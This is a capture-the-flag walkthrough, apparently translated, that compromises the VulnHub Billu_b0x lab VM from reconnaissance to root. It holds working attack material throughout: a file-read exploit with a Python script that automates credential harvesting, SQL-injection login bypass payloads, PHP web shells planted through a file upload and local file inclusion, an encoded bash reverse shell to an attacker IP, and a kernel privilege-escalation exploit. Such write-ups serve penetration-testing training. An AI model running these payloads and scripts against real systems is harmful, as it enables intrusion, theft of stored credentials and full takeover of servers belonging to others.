VulnHub Penetration Testing Practice Lab - Billu_b0x

Environment download

Click here to download the environment

Billu_b0x lab setup

Import the downloaded VM into VMware and set the network adapters of both the target and the attacking machine to NAT mode.


Penetration testing


Use Nmap to sweep the NAT /24 of the VMware Network Adapter VMnet8 interface: sudo nmap -sP 192.168.23.1/24 (-sP is the legacy spelling of -sn, a host discovery sweep with no port scan).


Target IP address identified: 192.168.23.130
Run a deeper Nmap scan: sudo nmap -sS -A 192.168.23.130 -oN billu.txt
The target exposes only ports 22 (SSH) and 80 (HTTP).


Approach to finding vulnerabilities:

  • SQL injection: the home page openly invites injection, so find a way to make it work
  • Directory brute forcing: run DirBuster, look for additional pages, and hunt for new bugs in them
  • Vulnerability scanning: feed the discovered pages to AWVS or AppScan
  • Manual discovery: browse the discovered pages through Burp (Firefox proxied through it) and inspect requests and responses by hand
  • Read the source of every page for hints
  • If a username and password turn up, try them over SSH; a working SSH login makes a reverse shell unnecessary

First try sqlmap: sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql. It finds nothing; the reason becomes clear later from the index.php source, which strips every single quote from the input before it reaches the query, and sqlmap's default payloads rely on the quote to break out of the string literal.


Enumerate the web directories with dirsearch: python3 dirsearch.py -u 192.168.23.130 -e php. Quite a few pages come back with a 200.


Testing the discovered pages shows that http://192.168.23.130/test.php reads arbitrary files: the file parameter of a POST request is handed straight to readfile(), with no authentication and no path restriction. Strictly this is an arbitrary file read rather than a file include (the content is sent back as a download, not executed), which is what makes it useful for pulling source code.


Using this bug, retrieve the PHP files found during directory enumeration:

  • c.php
```php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>
```
  • add.php
```php
<?php
echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
	<input type=text name=name value="name">
	<input type=text name=address value="address">
	<input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';
?>
```
  • index.php
```php
<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills
<br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps>
<br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));

	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0)
{
	$row = mysqli_fetch_assoc($result);
	echo "You are allowed<br>";
	$_SESSION['logged']=true;
	$_SESSION['admin']=$row['username'];

	header('Location: panel.php', true, 302);
}
else
{
	echo "<script>alert('Try again');</script>";
}

}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>
```
  • test.php
```php
<?php

function file_download($download)
{
	if(file_exists($download))
	{
		header("Content-Description: File Transfer");
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
		header('Accept-Ranges: bytes');
		header('Content-Disposition: attachment; filename="'.basename($download).'"');
		header('Content-Length: ' . filesize($download));
		header('Content-Type: application/octet-stream');
		ob_clean();
		flush();
		readfile ($download);
	}
	else
	{
		echo "file not found";
	}
}

if(isset($_POST['file']))
{
	file_download($_POST['file']);
}
else{
	echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}
```
  • panel.php
```php
<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
	header('Location: index.php', true, 302);
	exit();
}

echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>
 <select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select>
   &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);

	if($choice==='add')
	{
		include($dir.'/'.$choice.'.php');
		die();
	}

	if($choice==='show')
	{
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
}

if(isset($_POST['upload']))
{
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);

	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
		$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
		$image=array('jpeg','jpg','gif','png');
		if(in_array($r,$image))
		{
			$finfo = @new finfo(FILEINFO_MIME);
			$filetype = @$finfo->file($_FILES['image']['tmp_name']);
			if(preg_match('/image\/jpeg/',$filetype ) || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
			{
				if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
				{
					echo "Uploaded successfully ";
					$update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')';
					mysqli_query($conn, $update);
				}
			}
			else
			{
				echo "<br>i told you dear, only png,jpg and gif file are allowed";
			}
		}
		else
		{
			echo "<br>only png,jpg and gif file are allowed";
		}
	}
}
?>
```
  • /etc/passwd
```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
```

Reviewing the retrieved files gives the following:

  • /etc/passwd contains one regular account, ica (uid 1000); the SSH usernames worth trying are ica and root
  • c.php holds the MySQL credentials: user billu, password b0x_billu, database ica_lab

Trying the MySQL credentials against phpMyAdmin fails (the reason is explained further down).


After redeploying the VM, the same credentials log in, and the auth table in the ica_lab database holds the web login: username biLLu, password hEx_it.


Getting a shell

Getting root

Further directory brute forcing turns up the phpmy directory (phpMyAdmin). phpMyAdmin's default configuration file is config.inc.php, so read it through the same test.php file read as before: it contains the MySQL root credentials, user root, password roottoor.

```php
<?php
/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';

/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>
```
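The listings above were pulled one at a time; as an added helper (not part of the original walkthrough, and not code from the box), the following Python script does the same job in a loop. It POSTs file=<path> to test.php, which passes the value straight to readfile(), and then scrapes the credentials out of c.php and out of phpMyAdmin's config.inc.php, plus the SSH username candidates out of /etc/passwd. The target URL is the one used on this page; the web root /var/www and the config path /var/www/phpmy/config.inc.php are assumptions (the page only says the directory is called phpmy). The parsing helpers work offline; the strings they are exercised with below are constructed from the listings.

```python
"""Added helper: read files through test.php and harvest credentials."""
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.23.130/test.php"   # target from the walkthrough
# /var/www/phpmy/config.inc.php assumes the default Ubuntu web root;
# the page only states that the directory is named phpmy.
PATHS = ["c.php", "index.php", "panel.php", "add.php", "test.php",
         "/etc/passwd", "/var/www/phpmy/config.inc.php"]


def read_file(path, url=TARGET, timeout=5):
    """POST file=<path>; test.php hands it straight to readfile()."""
    data = urllib.parse.urlencode({"file": path}).encode()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# mysqli_connect("host","user","pass","db") exactly as written in c.php
MYSQLI_RE = re.compile(
    r'mysqli_connect\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
# $cfg['Servers'][$i]['user'] = 'root';  style lines in config.inc.php
PMA_RE = re.compile(
    r"\$cfg\['Servers'\]\[\$i\]\['(host|user|password)'\]\s*=\s*'([^']*)'")


def extract_mysqli_creds(php_src):
    """Return {host, user, password, db} from a mysqli_connect() call, or None."""
    m = MYSQLI_RE.search(php_src)
    if not m:
        return None
    return dict(zip(("host", "user", "password", "db"), m.groups()))


def extract_pma_creds(cfg_src):
    """Return the host/user/password entries of a phpMyAdmin server block, or None."""
    found = dict(PMA_RE.findall(cfg_src))
    return found or None


def login_candidates(passwd):
    """uid 0 and ordinary (uid >= 1000) accounts with a real shell: the
    usernames worth trying over SSH once a password turns up."""
    out = []
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit():
            continue
        uid = int(f[2])
        if f[6] in ("/bin/bash", "/bin/sh") and (uid == 0 or 1000 <= uid < 65534):
            out.append((f[0], uid, f[6]))
    return out


if __name__ == "__main__":
    # network part: only runs when executed directly from the attacking machine
    for p in PATHS:
        try:
            body = read_file(p)
        except OSError as e:
            print(f"[-] {p}: {e}")
            continue
        print(f"[+] {p}: {len(body)} bytes")
        for creds in (extract_mysqli_creds(body), extract_pma_creds(body)):
            if creds:
                print("    creds:", creds)
        if p == "/etc/passwd":
            print("    ssh candidates:", login_candidates(body))
```

The network calls sit under the __main__ guard so the parsers can be imported and exercised without the box being up; read_file() takes any absolute path, so the same routine is what fetches config.inc.php in the next step.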

The same password works for SSH: log in with Xshell as root / roottoor and you have a root shell.
As for the earlier MySQL failure: checking afterwards showed the service status as mysql stop/waiting, i.e. MySQL was not running at all; the author's guess is that the high-thread directory brute forcing and scanning knocked it over. (A service mysql start on the box would have brought it back without reimporting the VM.)

Getting a non-root shell

  • Method 1: log in to the web panel with the username and password read out of phpMyAdmin
  • Method 2: audit the index.php source, which applies the following filter to the login fields:
```php
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
```

str_replace('\'','',...) deletes every single quote from the input (the backslash is just PHP's escape for the quote inside a single-quoted string). urldecode runs first, so a quote smuggled in as %27 or %2527 is decoded and then deleted as well. What is not deleted is the backslash, and MySQL treats \' inside a string literal as an escaped quote: send a single \ as the password and the query's pass='\' and uname='...' no longer closes the password string where the developer expected, so the username field lands outside any string literal. With the username  or 1=1 -- - the statement becomes select * from auth where pass='...' or 1=1 and the login succeeds. The payload as printed on this page, ' or 1=1 -- ' in both fields, reaches the query as  or 1=1 --  inside a string literal once the quotes are stripped, so the working form has to carry the backslash in the password field (this page's rendering drops backslashes elsewhere as well). With that, the web panel opens.
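To make the filter's effect concrete, here is an added Python model (example code, not from the page or the box) that applies exactly the urldecode + quote stripping index.php does, builds the same query string, and then tokenises it the way MySQL would, honouring \' escapes inside literals and -- comments, to show which payloads end up outside a string literal. The payloads it is run on are constructed test inputs.

```python
"""Added model of index.php's login filter and the resulting SQL."""
import urllib.parse


def billu_filter(value):
    # index.php: str_replace('\'', '', urldecode($_POST[...]))
    # $_POST is already decoded once; urldecode() decodes a second time,
    # so %2527 -> %27 -> ' is still stripped. Backslashes survive.
    return urllib.parse.unquote(value).replace("'", "")


def build_query(un, ps):
    """The exact concatenation index.php performs (note: pass comes first)."""
    return ("select * from auth where  pass='" + billu_filter(ps)
            + "' and uname='" + billu_filter(un) + "'")


def sql_skeleton(sql):
    """Replace MySQL single-quoted literals with ? and drop a trailing '-- '
    comment, honouring backslash escapes inside literals. Returns None when a
    literal is left unterminated (MySQL would reject the statement)."""
    out, i, in_str = [], 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":
                i += 2            # escaped character, whatever follows
                continue
            if c == "'":
                in_str = False
                out.append("?")
            i += 1
        elif c == "'":
            in_str = True
            i += 1
        elif sql.startswith("-- ", i) or sql[i:] == "--":
            break                 # rest of the statement is a comment
        else:
            out.append(c)
            i += 1
    return None if in_str else "".join(out)


def bypasses_login(un, ps):
    """True when the injected 'or 1=1' sits outside every string literal."""
    sk = sql_skeleton(build_query(un, ps))
    return sk is not None and " or 1=1" in sk


if __name__ == "__main__":
    for un, ps in [(" or 1=1 -- -", "\\"),                   # backslash in the password
                   (" or 1=1 -- -", "%5C"),                  # same, URL-encoded backslash
                   ("' or 1=1 -- '", "' or 1=1 -- '"),       # quotes only: stripped
                   ("\\", " or 1=1 -- -")]:                  # fields the wrong way round
        print(repr(build_query(un, ps)), "->", bypasses_login(un, ps))
```

The field order matters because the password is concatenated first: the escaped quote has to sit in the password so that the username is the part that spills out of the literal; swapping them leaves the statement unterminated and MySQL returns a syntax error instead of a row.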


Clicking Add User opens the add-account form, which is an image upload; combining the upload with a file include gives a shell.
The panel.php source obtained earlier through test.php shows a local file inclusion: $choice (with ./ stripped) is only used for the add/show comparison, and the else branch includes the raw $_POST['load'] appended to the web root, so an uploaded file, or any path reachable from there by traversal, can be included:

```php
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);

	if($choice==='add')
	{
		include($dir.'/'.$choice.'.php');
		die();
	}

	if($choice==='show')
	{
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
}
```

Generate a PHP payload with msfvenom for a reverse shell: msfvenom -p php/meterpreter/reverse_…

Start a listener in msf and send the upload and include requests with Burp Suite. A shell comes back, but commands typed into it have no effect (not sure why).


Upload another payload, this time the one-liner <?php system($_POST['cmd']);?>, and send it with Burp Suite following the same steps. It still has to carry an allowed image extension and begin with an image signature to pass the extension and finfo checks in panel.php.


Get a reverse shell with bash: URL-encode the command echo "bash -i >& /dev/tcp/192.168.23.128/1234 0>&1" | bash as %65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%33%2e%31%32%38%2f%31%32%33%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68, start a listener, and send the request again.


Privilege escalation

Upgrade the shell to a TTY for an interactive session: python -c 'import pty;pty.spawn("/bin/bash")'
Check the kernel and distribution: uname -a and cat /etc/issue


With the kernel version in hand, look for a matching exploit: https://www.exploit-db.com/exploits/37292 (the overlayfs local privilege escalation, CVE-2015-1328, which targets Ubuntu 12.04/14.04/14.10/15.04 kernels from 3.13 up to 3.19).


To make uploading the exploit easier, drop a web shell into the upload directory uploaded_images:

echo '<?php eval($_POST["d1no"]);?>' > d1no.php

(The page's original command had single quotes around d1no inside a single-quoted shell string, so the file ends up containing $_POST[d1no]; PHP 5 tolerates the bare word with a notice, but double quotes avoid the problem.)

Upload the exploit with AntSword and run it:

  1. Grant permissions: chmod 777 37292.c (not actually required; the source only needs to be readable, and gcc marks its output executable)
  2. Compile the exploit: gcc 37292.c -o exp
  3. Run the exploit: ./exp, which drops into a root shell

Copyright notice: published by 玥玥 on 2021-08-06 10:37:45.
When reposting please credit: VulnHub渗透测试实战靶场 - Billu_b0x | 女黑客导航